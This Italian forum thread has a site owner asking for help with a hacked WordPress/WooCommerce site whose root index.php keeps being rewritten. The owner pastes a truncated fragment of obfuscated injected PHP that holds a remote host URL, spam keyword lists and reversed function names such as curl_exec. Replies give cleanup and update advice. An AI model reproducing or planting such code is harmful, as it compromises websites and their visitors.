• Super User

    [Dominio] File con permessi 444 e codice malevolo

    Buongiorno a tutti,
    ho un dominio su Aruba, nel ho pubblicato:

    • un ecommerce nella directory /shop
    • un file index.php nella root che al momento fa un redirect alla cartella /shop

    Da un mesetto circa il file index.php e' stato modificato (non da me) con del codice malevole con tutte le conseguenze del caso.

    Il problema e' che tale file ha i permessi settati a 444, provo a modificarli e ottengo un messaggio di errore.
    Ho richiesto supporto ad Aruba.it per la cancellazione, una volta cancellato viene generato nuovamente.
    Stesso identico problema ce l'ho con il file .htaccess

    Qualche suggerimento?

    Qui una parte del contenuto:

    
    <?php @'$
    yumingid=47
    lineid=2332
    x3=index.php/
    x4=ghpyxlOwbV
    x5=underlying,roadside,alone,ethics,smaller,hotpants,agree,jasper,horse,Baby,stick,despair,SharkFin,bulk,Apprentice,whole,plow,coconutmilk,trunklineelectrification,inspire,impossible,pantyhose,earthquake,sage,BarberShop,carrier,evidence,English,Latin,definite
    x6=
    x7=http://jnice01.ouuwtizhy573nskt/weilai0.php
    cache=0000
    sps=111111000
    urlgz=[0:3]^[0:8]-[0:6~12][1:6]/[0:8~10]!/|[0:7~10]^/[1:8]/!/[0:10~15]/|[0:8~10]^-[2:10~12]-[2:4]-[2:6]-!/|^-[2:8~12]-[2:5~10]-[0:5][1:8]/![0:3]/|^[0:10~12]/[0:1]_[2:8~12]-!/|[0:10~12]^/[0:6~12]_[1:6]-!/|[0:10~15]_[0:6~10]-^-![0:2]/|[0:10~12]-[0:1]^-[0:4]-[0:1]!-[0:10~12]/|[0:1]^-[0:3]-[0:10~12]-[0:5]-[0:5]!/|^/[0:10~12]_[1:3~5][0:4]-[0:8]-!/|^[0:5]_[1:5]_[2:12~15]_!|[0:3~5]-^-[1:10~12]-[0:10~12]/![0:2]|^[0:6~8]/[1:8~12]-!/[0:5~8]|^_[1:6~8]_[1:6~8]/[2:8~12]_[0:5~8]/!|[0:12]_^-[2:10~15]_[0:6~8]_!|[0:10~15]/^-[1:6~8]/!|^[3:6~10]/[0:1]_[2:12]_!|[0:8]/[0:6~8]/^-!/[0:8~10].php|^/[2:10~12]/[1:8~10]-!-[0:3].jp|^_[1:6~8]/[1:6~8]_[0:10~12][1:5]/!.jp|[0:3]^[0:3]-[2:8]-[1:5][0:3]-[2:6]-[0:6][1:4]/[0:2]!.html|[0:8~10]/^-!/[0:15~18].html|[0:6~8]/[0:15~18]/^-!.html
    ';$bbb6b6b66=explode("1l","tilps_gerp1ledocnelru1lemaner1lyarra_ni1lezilairesnu1lstegf1l5dm1lcexe_lruc1lofniphp1lstnetnoc_teg_elif1lrtsbus1ldomhc1llla_hctam_gerp1ldnar_tm1lrewolotrts1lnelrts1lrhc1letad1lemit1lemitmelif1lliec1lgnol2pi1lnepof1ltroba_resu_erongi1lsehsalscdda1ldnar_yarra1llru_esrap1lenifed1ledocedlru1lemanybtsohteg1lelffuhs1lfoef1lrtrts1ltini_lruc1ltfihsnu_yarra1lftnirps1ledolpmi1lciremun_si1lhcuot1letirwf1lyarra_si1lemitotrts1ltimil_emit_tes1lredaeh1legrem_yarra1leuqinu_yarra1ltrats_bo1ltnuoc1lelif_si1lstsixe_noitcnuf1lstsixe_elif1lhctam_gerp1lecalper_gerp1leikooctes1lsoprts1lmirt1lsopirts1lrddaybtsohteg1ltcartxe1legnar1lesolcf1ldro1ledolpxe1lpop_yarra1lsoprrts1lesolc_lruc1ltpotes_lruc1lecalper_rts");foreach($bbb6b6b66 as$b6bbbbbbb=>$bbbb6b6)
    .....
    
    

  • Moderatore

    Ciao
    hai una falla nel sito, che Cms usi? E' tutto aggiornato? Se si ricontatta l'Hosting e chiedigli la risoluzione o identificazione del problema. Se non rispondono o identificano cambia Hosting.


  • User Attivo

    @felino said:

    Buongiorno a tutti

    Ciao,

    @felino said:

    Qualche suggerimento?

    Sì, quello di trasferirlo altrove, magari presso qualcuno che ha un filtro antimalware/antivirus sul server...


  • User Newbie

    La fate un po facile !
    qui hanno usato una vulnerabilita applicativa per accedere al file system, l'hoster puo fare dei controlli ed avere anche tool di antivirus ma se il codice e scritto male ce poco da fare, se tu scrivi un codice che permette l'upload di files non sicuro ci metto 5 minuti ad usarlo e l'hoster che fa lo blocca? L'applicazione deve essere scritta in modo corretto e sicuro altrimenti l'ISP non puo rimediare e se LO FA avrai 1000 problem perché TROPPA sicurezza vuole dire non fare funzionare 1000 cose… la risposta semplice e cambia provider e poi continua a cambiarlo, non e suo compito garantire al sicurezza applicativa.

    Utixo Cloud Services


  • User Attivo

    @utixo cloud said:

    se tu scrivi un codice che permette l'upload di files non sicuro ci metto 5 minuti ad usarlo e l'hoster che fa lo blocca?

    Sì, siamo nel 2019, un buon application firewall può riconoscere e bloccare dei POST malevoli senza grossi problemi, sia tramite signature che tramite predizioni di tipo euristico, con basso rischio di falsi positivi.
    Poi è chiaro che può sempre esserci un zeroday o qualcosa possa sfuggire al controllo ma, nel caso specifico, disponendo del codice malevolo, se è sempre lo stesso, non è che ci voglia granchè a bloccarlo...


  • User Newbie

    @Shazan said:

    Sì, siamo nel 2019, un buon application firewall può riconoscere e bloccare dei POST malevoli senza grossi problemi, sia tramite signature che tramite predizioni di tipo euristico, con basso rischio di falsi positivi.
    Poi è chiaro che può sempre esserci un zeroday o qualcosa possa sfuggire al controllo ma, nel caso specifico, disponendo del codice malevolo, se è sempre lo stesso, non è che ci voglia granchè a bloccarlo...

    La sicurezza e' una cosa piu complessa che installare semplicemente un antivirus da pochi Euro sul server o abilitare il mod_security ... ci sono piu livelli da proteggere dal sistema operativo al layer del pannello di controllo, all'interprete PHP e anche all'applicativo ...senza entrare nel merito preciso nel caso è difficile dare un giudizio se e colpa di Aruba o no ... e questo che voglio dire ..


  • Super User

    Grazie del supporto.

    L'ecommerce e' realizzato tramite Wordpress + WooCommerce.

    Ho preso in gestione il tutto da qualche settimana.
    Il problema, secondo me, e' stato generato da una backup sul dominio stesso di una versione di Woordpress+Woocommerce abbastanza datata!

    Ho provveduto ad eliminare il superfluo ed aggiornare il CMS, i relativi plugin ed il theme con l'ultima versione online.


  • User Attivo

    Se nel tuo hosting non è presente un anti-malware o anti-virus esegui una scansione con sucuri: https://sitecheck.sucuri.net/

    Ciao. 🙂


  • Super User

    Ecco qui il risultato della scansione:
    Outdated Software Detected PHP under 5.6.40 Vulnerabilities on PHP 5.6
    Outdated Software Detected WordPress under 5.1.1/5.0.4/4.9.10

    Ovviamente sto gia' provvedendo all'aggiornamento di entrambi.

    Grazie per avermi segnalato questo tool.

    Security Updates


  • Community Manager

    Ho eliminato i post di utixo cloud e francois. A quest'ultimo è stata data la possibilità di scegliere tra chiedere scusa per il modo in cui ha risposto oppure di presentare le dimissioni come moderatore. Si è dimesso.

    Vi prego di continuare con la discussione e di stare tranquilli, non c'è bisogno di alzare i toni per discutere civilmente.

    Se avete dubbi io in privato ci sono sempre.

    Altrimenti la prossima volta vi allontaniamo dal forum, ci sono tanti altri luoghi su Internet dove arrabbiarsi e insultarsi. Non da noi 🙂

    :ciauz: